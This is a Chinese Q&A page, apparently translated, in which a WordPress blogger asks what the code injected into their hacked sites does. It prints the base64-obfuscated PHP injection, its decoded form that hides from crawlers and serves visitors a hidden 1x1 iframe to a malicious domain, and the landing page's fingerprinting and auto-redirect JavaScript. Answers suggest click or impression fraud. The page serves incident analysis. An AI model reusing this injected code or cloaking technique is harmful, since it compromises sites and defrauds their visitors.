如何解决WordPress遭黑客入侵:此脚本实际上是做什么的?
| 我维护着三个wordpress博客,昨天上午,它们都被黑了。 在我所有的“ 0”中,第一行如下所示:<?PHP eval(base64_decode(\'ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJhesgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJhesgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJhesgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGlmcmFtZSBzcmM9Imh0dHA6Ly93dW1wZWFycG15LmN6LmNjL2dvLzEiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaWZyYW1lPic7DQp9\'))
除了修复它(似乎可行)之外,我想知道它的作用和目的。
所以我解码了插入的代码:
error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array(\'bot\',\'spider\',\'spyder\',\'crawl\',\'validator\',\'slurp\',\'docomo\',\'yandex\',\'mail.ru\',\'alexa.com\',\'postrank.com\',\'htmldoc\',\'webcollage\',\'blogpulse.com\',\'anonymouse.org\',\'12345\',\'httpclient\',\'buzztracker.com\',\'snoopy\',\'Feedtools\',\'arianna.libero.it\',\'internetseer.com\',\'openacoon.de\',\'rrrrrrrrr\',\'magent\',\'download master\',\'drupal.org\',\'vlc media player\',\'vvrkimsjuwly l3ufmjrx\',\'szn-image-resizer\',\'bdbrandprotect.com\',\'wordpress\',\'RSSreader\',\'mybloglog api\');
$stop_ips_masks = array(
array(\"216.239.32.0\",\"216.239.63.255\"),array(\"64.68.80.0\",\"64.68.87.255\" ),array(\"66.102.0.0\",\"66.102.15.255\"),array(\"64.233.160.0\",\"64.233.191.255\"),array(\"66.249.64.0\",\"66.249.95.255\"),array(\"72.14.192.0\",\"72.14.255.255\"),array(\"209.85.128.0\",\"209.85.255.255\"),array(\"198.108.100.192\",\"198.108.100.207\"),array(\"173.194.0.0\",\"173.194.255.255\"),array(\"216.33.229.144\",\"216.33.229.151\"),array(\"216.33.229.160\",\"216.33.229.167\"),array(\"209.185.108.128\",\"209.185.108.255\"),array(\"216.109.75.80\",\"216.109.75.95\"),array(\"64.68.88.0\",\"64.68.95.255\"),array(\"64.68.64.64\",\"64.68.64.127\"),array(\"64.41.221.192\",\"64.41.221.207\"),array(\"74.125.0.0\",\"74.125.255.255\"),array(\"65.52.0.0\",\"65.55.255.255\"),array(\"74.6.0.0\",\"74.6.255.255\"),array(\"67.195.0.0\",\"67.195.255.255\"),array(\"72.30.0.0\",\"72.30.255.255\"),array(\"38.0.0.0\",\"38.255.255.255\")
);
$my_ip2long = sprintf(\"%u\",ip2long($_SERVER[\'REMOTE_ADDR\']));
foreach ( $stop_ips_masks as $IPs ) {
$first_d=sprintf(\"%u\",ip2long($IPs[0])); $second_d=sprintf(\"%u\",ip2long($IPs[1]));
if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
if (strpos($_SERVER[\'HTTP_USER_AGENT\'],$bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
echo \'<iframe src=\"http://wumpearpmy.cz.cc/go/1\" width=\"1\" height=\"1\"></iframe>\';
}
粗略地讲,如果我理解正确的话,它将显示一个额外的iframe
,并且需要加载一些源,但前提是用户代理和ip不在阻止的ip或阻止的bot列表中。我的猜测:确保我的网站不会被列入黑名单,但是任何访问者仍然会被垃圾邮件。
但是我仍然很好奇:它实际上是做什么的?
因此,我使用RestClient跟随了指向http://wumpearpmy.cz.cc/go/1的链接,并获得了以下返回的HTML:
<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">
<html>
<title>http://groupon.be</title>
<head>
<STYLE>
BODY {
BACKGROUND: #666; FONT: 100% Georgia,\"Times New Roman\",Times,serif; COLOR: #666
}
A {
COLOR: #fe701a
}
A:hover {
COLOR: #fdc336
}
P {
FONT: 105% century
}
.main_wrapper{
width:90%; margin:auto; border:10px solid #888888; background-color:#FFFFFF; margin-top:25px; height:450px;
}
.skipimage{margin:auto; text-align:center; height:30%}
.img_wrapper{background-image:url(continue.gif); background-position:top; background-repeat:no-repeat; width:435px; height:215px}
</style>
<script type=\"text/javascript\">
function getCookie(name){var start=document.cookie.indexOf(name+\"=\");var len=start+name.length+1;if((!start)&&(name!=document.cookie.substring(0,name.length))){return null;}
if(start==-1)return null;var end=document.cookie.indexOf(\';\',len);if(end==-1)end=document.cookie.length;return unescape(document.cookie.substring(len,end));}function setCookie(name,value,expires,path,domain,secure){var today=new Date();today.setTime(today.getTime());
var expires_date=new Date(today.getTime()+(expires));document.cookie=name+\'=\'+escape(value)+
((expires)?\';expires=\'+expires_date.toGMTString():\'\')+
((path)?\';path=\'+path:\'\')+
((domain)?\';domain=\'+domain:\'\')+
((secure)?\';secure\':\'\');}
</script>
</head>
<body>
<form method=\"get\" action=\"http://clicks.maximumspeedfind.com/xtr3_new?q=domain+names\" name=\"rr\">
<input type=\"hidden\" name=\"sid\" value=\"294787600\" />
<input type=\"hidden\" name=\"sa\" value=\"13\" />
<input type=\"hidden\" name=\"p\" value=\"1\" />
<input type=\"hidden\" name=\"s\" value=\"98795\" />
<input type=\"hidden\" name=\"qt\" value=\"1307865129\" />
<input type=\"hidden\" name=\"q\" value=\"domain names\" />
<input type=\"hidden\" name=\"rf\" value=\"\" />
<input type=\"hidden\" name=\"enc\" value=\"\" />
<input type=\"hidden\" name=\"enk\" value=\"RsmGuQe5xoEG4yaZj4mPyQe5J6mPiWaB5sHGqSaRJ+Mm\" />
<input type=\"hidden\" name=\"xsc\" value=\"\" />
<input type=\"hidden\" name=\"xsp\" value=\"\" />
<input type=\"hidden\" name=\"xsm\" value=\"\" />
<input type=\"hidden\" name=\"xuc\" value=\"\"/>
<input type=\"hidden\" name=\"xcf\" value=\"\"/>
<input type=\"hidden\" name=\"xai\" value=\"\"/>
<input type=\"hidden\" name=\"qxcli\" value=\"8904e76aaa70acee\" />
<input type=\"hidden\" name=\"qxsi\" value=\"e0f63d5350e1c1d9\" />
<input type=\"hidden\" name=\"mk\" value=\"1\" />
<input type=\"hidden\" name=\"ScreenX\" value=\"0\" />
<input type=\"hidden\" name=\"ScreenY\" value=\"0\" />
<input type=\"hidden\" name=\"browserX\" value=\"0\" />
<input type=\"hidden\" name=\"browserY\" value=\"0\"/>
<input type=\"hidden\" name=\"MouseX\" value=\"0\"/>
<input type=\"hidden\" name=\"MouseY\" value=\"0\"/>
<input type=\"hidden\" name=\"is_iframe\" value=\"0\"/>
</form>
<div class=\"main_wrapper\">
<table width=\"60%\" border=\"0\" align=\"center\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\">
<tr>
<td align=\"center\" valign=\"middle\">
<table width=\"435\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">
<tr>
<td class=\"img_wrapper\" >
<div style=\"width:60%; margin:auto;height:215px;\">
<div class=\"skipimage\" style=\"padding-top:40px;\">
<!-- a href=\"javascript:void(0)\" onclick=\"press();\"><img src=\"skip.gif\" / border=\"0\"></a -->
<a href=\"http://clicks.maximumspeedfind.com/xtr3_new?q=domain+names&enk=RsmGuQe5xoEG4yaZj4mPyQe5J6mPiWaB5sHGqSaRJ+Mm&rf=&qxcli=8904e76aaa70acee&qxsi=e0f63d5350e1c1d9\"><img src=\"skip.gif\" / border=\"0\"></a>
</div>
<div class=\"skipimage\">
<img src=\"ajax-loader.gif\" / border=\"0\">
<P><SPAN>Your request is loading...</SPAN></P>
</div>
</div>
</td>
</tr>
</table>
<br />
<p>If you are not redirected within 2 seconds <a href=\"http://clicks.maximumspeedfind.com/xtr3_new?q=domain+names&enk=RsmGuQe5xoEG4yaZj4mPyQe5J6mPiWaB5sHGqSaRJ+Mm&rf=&qxcli=8904e76aaa70acee&qxsi=e0f63d5350e1c1d9\">click here</a> to continue</p>
</td>
</tr>
</table>
</div>
<script type=\"text/javascript\">
var hexcase=0;var b64pad=\"\";var chrsz=8;function hex_md5(s){return binl2hex(core_md5(str2binl(s),s.length*chrsz));}
function core_md5(x,len){x[len>>5]|=0x80<<((len)%32);x[(((len+64)>>>9)<<4)+14]=len;var a=1732584193;var b=-271733879;var c=-1732584194;var d=271733878;for(var i=0;i<x.length;i+=16){var olda=a;var oldb=b;var oldc=c;var oldd=d;a=md5_ff(a,b,c,d,x[i+0],7,-680876936);d=md5_ff(d,a,x[i+1],12,-389564586);c=md5_ff(c,x[i+2],17,606105819);b=md5_ff(b,x[i+3],22,-1044525330);a=md5_ff(a,x[i+4],-176418897);d=md5_ff(d,x[i+5],1200080426);c=md5_ff(c,x[i+6],-1473231341);b=md5_ff(b,x[i+7],-45705983);a=md5_ff(a,x[i+8],1770035416);d=md5_ff(d,x[i+9],-1958414417);c=md5_ff(c,x[i+10],-42063);b=md5_ff(b,x[i+11],-1990404162);a=md5_ff(a,x[i+12],1804603682);d=md5_ff(d,x[i+13],-40341101);c=md5_ff(c,x[i+14],-1502002290);b=md5_ff(b,x[i+15],1236535329);a=md5_gg(a,5,-165796510);d=md5_gg(d,9,-1069501632);c=md5_gg(c,14,643717713);b=md5_gg(b,20,-373897302);a=md5_gg(a,-701558691);d=md5_gg(d,38016083);c=md5_gg(c,-660478335);b=md5_gg(b,-405537848);a=md5_gg(a,568446438);d=md5_gg(d,-1019803690);c=md5_gg(c,-187363961);b=md5_gg(b,1163531501);a=md5_gg(a,-1444681467);d=md5_gg(d,-51403784);c=md5_gg(c,1735328473);b=md5_gg(b,-1926607734);a=md5_hh(a,4,-378558);d=md5_hh(d,11,-2022574463);c=md5_hh(c,16,1839030562);b=md5_hh(b,23,-35309556);a=md5_hh(a,-1530992060);d=md5_hh(d,1272893353);c=md5_hh(c,-155497632);b=md5_hh(b,-1094730640);a=md5_hh(a,681279174);d=md5_hh(d,-358537222);c=md5_hh(c,-722521979);b=md5_hh(b,76029189);a=md5_hh(a,-640364487);d=md5_hh(d,-421815835);c=md5_hh(c,530742520);b=md5_hh(b,-995338651);a=md5_ii(a,6,-198630844);d=md5_ii(d,10,1126891415);c=md5_ii(c,15,-1416354905);b=md5_ii(b,21,-57434055);a=md5_ii(a,1700485571);d=md5_ii(d,-1894986606);c=md5_ii(c,-1051523);b=md5_ii(b,-2054922799);a=md5_ii(a,1873313359);d=md5_ii(d,-30611744);c=md5_ii(c,-1560198380);b=md5_ii(b,1309151649);a=md5_ii(a,-145523070);d=md5_ii(d,-1120210379);c=md5_ii(c,718787259);b=md5_ii(b,-343485551);a=safe_add(a,olda);b=safe_add(b,oldb);c=safe_add(c,oldc);d=safe_add(d,oldd);} return Array(a,d);}
function md5_cmn(q,x,s,t){return safe_add(bit_rol(safe_add(safe_add(a,q),safe_add(x,t)),s),b);}function md5_ff(a,t){return md5_cmn((b&c)|((~b)&d),t);}function md5_gg(a,t){return md5_cmn((b&d)|(c&(~d)),t);}function md5_hh(a,t){return md5_cmn(b^c^d,t);}function md5_ii(a,t){return md5_cmn(c^(b|(~d)),t);}function safe_add(x,y){var lsw=(x&0xFFFF)+(y&0xFFFF);var msw=(x>>16)+(y>>16)+(lsw>>16);return(msw<<16)|(lsw&0xFFFF);}function bit_rol(num,cnt){return(num<<cnt)|(num>>>(32-cnt));}function str2binl(str){var bin=Array();var mask=(1<<chrsz)-1;for(var i=0;i<str.length*chrsz;i+=chrsz) bin[i>>5]|=(str.charCodeAt(i/chrsz)&mask)<<(i%32);return bin;}function binl2hex(binarray){var hex_tab=hexcase?\"0123456789ABCDEF\":\"0123456789abcdef\";var str=\"\";for(var i=0;i<binarray.length*4;i++) {str+=hex_tab.charat((binarray[i>>2]>>((i%4)*8+4))&0xF)+ hex_tab.charat((binarray[i>>2]>>((i%4)*8))&0xF);} return str;}
/* function getCookie(cookiename){ var cookiestring=\"\"+document.cookie; var index1=cookiestring.indexOf(cookiename); if(index1==-1 || cookiename==\"\") return \"\"; var index2=cookiestring.indexOf(\';\',index1); if (index2==-1) index2=cookiestring.length; return unescape(cookiestring.substring(index1+cookiename.length+1,index2));} */
function add_ch(n,v){ if(v) { window.dch +=\"[\"+n+\":\"+enc_data(v)+\"]\";}}function enc_data(b){ if(typeof encodeURIComponent==\"function\") { return encodeURIComponent(b);} else {return escape(b);}}function G() {var dt = new Date(); if(!window.dch) { window.dch = \"\";} if(screen) { add_ch(\"h\",screen.height); add_ch(\"w\",screen.width); add_ch(\"cd\",screen.colorDepth);} add_ch(\"tz\",-dt.getTimezoneOffset()); add_ch(\"jv\",navigator.javaEnabled()); if (navigator.plugins) { add_ch(\"pg\",navigator.plugins.length); } if (navigator.mimeTypes) { add_ch(\"mm\",navigator.mimeTypes.length); } add_ch(\'ua\',navigator.userAgent); add_ch(\'ts\',Date.parse(dt)); tr = hex_md5(dch); setCookie(\'xch\',tr,63072000000,\'/\',\'\',\'\');}function gsc(){if(!getCookie(\"xch\")){G();}} gsc();
// global variable
var screenwidth;
var screenheight;
var viewportwidth;
var viewportheight;
var myMouseX,myMouseY;
var event_flag = false;
//window.onload = press;
function press(){
var dim = screenDimension();
document.forms[\'rr\'].ScreenX.value = dim[0];
document.forms[\'rr\'].ScreenY.value = dim[1];
// browser X*Y
var dim_browser = browserDimension();
document.forms[\'rr\'].browserX.value = dim_browser[0];
document.forms[\'rr\'].browserY.value = dim_browser[1];
if((window.top!=window.self)){
document.forms[\'rr\'].is_iframe.value = 1;
}
// document.onmousemove=getXYPosition; // start event listener
if (getCookie(\'mrc\') != \"groupon.be\") {
setCookie(\'mrc\',\'groupon.be\',180000,\'.maximumspeedfind.com\',\'\');
document.forms[\'rr\'].submit();
}else{
document.forms[\'rr\'].action = \'http://clicks.maximumspeedfind.com/xtr2_new?q=domain+names&enk=RsmGuQe5xoEG4yaZj4mPyQe5J6mPiWaB5sHGqSaRJ+Mm&rf=&qxcli=8904e76aaa70acee&qxsi=e0f63d5350e1c1d9\';
document.forms[\'rr\'].submit();
}
}
/*
// mouse postion
function getXYPosition(e){
if(!event_flag){
// console.debug(e);
myMouseX = mouseXPos(e);
myMouseY = mouseYPos(e);
document.forms[\'rr\'].MouseX.value = myMouseX;
document.forms[\'rr\'].MouseY.value = myMouseY;
event_flag = true;
}
}
*/
// Screen
function screenDimension(){
if (typeof screen.width != \'undefined\' && typeof screen.height != \'undefined\' )
{
screenwidth = screen.width;
screenheight = screen.height;
}
return [screenwidth,screenheight];
}
// browser
function browserDimension(){
// the more standards compliant browsers (mozilla/netscape/opera/IE7) use window.innerWidth and window.innerHeight
if (typeof window.innerWidth != \'undefined\')
{
viewportwidth = window.innerWidth,viewportheight = window.innerHeight
}
// IE6 in standards compliant mode (i.e. with a valid doctype as the first line in the document)
else if (typeof document.documentElement != \'undefined\' && typeof document.documentElement.clientWidth != \'undefined\' && document.documentElement.clientWidth != 0)
{
viewportwidth = document.documentElement.clientWidth,viewportheight = document.documentElement.clientHeight
}
// older versions of IE
else
{
viewportwidth = document.getElementsByTagName(\'body\')[0].clientWidth,viewportheight = document.getElementsByTagName(\'body\')[0].clientHeight
}
var my = [viewportwidth,viewportheight];
return [viewportwidth,viewportheight];
//document.write(\'<p>Your viewport width is \'+viewportwidth+\'x\'+viewportheight+\'</p>\');
}
/*
// Mouse postion
function mouseXPos(evt) {
if (evt.pageX)
return evt.pageX;
else if (evt.clientX)
return evt.clientX + (document.documentElement.scrollLeft ?document.documentElement.scrollLeft :document.body.scrollLeft);
else return null;
}
function mouseYPos(evt) {
if (evt.pageY) return evt.pageY;
else if (evt.clientY)
return evt.clientY + (document.documentElement.scrollTop ?document.documentElement.scrollTop :document.body.scrollTop);
else return null;
}
*/
press();
</script>
</body>
</html>
好。我可以读groupon.com
,但我猜这只是假的(太明显了?),它将检查cookie的存在吗?哪个饼干?我无法立即推断出这一点。它将在两秒钟内发布到clicks.maximumspeedfind.com。我没有尝试这样做。
许多代码可确保窗口保持很小,几乎不可见。但是似乎也有很多混淆的代码。
任何人都可以启发我他们在这里想做什么吗?如何?
这是他们试图伪造的点击率吗? (也许天真)。
解决方法
首先,它对搜寻器隐藏起来,而搜寻器会检测到它并警告网站管理员。其次,这似乎是网络钓鱼攻击。好吧,不完全是。我认为有人为获得的展示次数获得报酬,并通过使用iframe伪造了一些。
简短的版本是:没有什么有益的。
, 如果我没记错的话,他们正在尝试将一些数据发布到服务器上。为此,他们需要唯一的IP。他们希望通过重定向您的读者来获得。好像它在搜索引擎中搜索域名一样。可能是他们试图通过将人们重定向到具有特定引荐来源网址的搜索页面来获取收入。
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。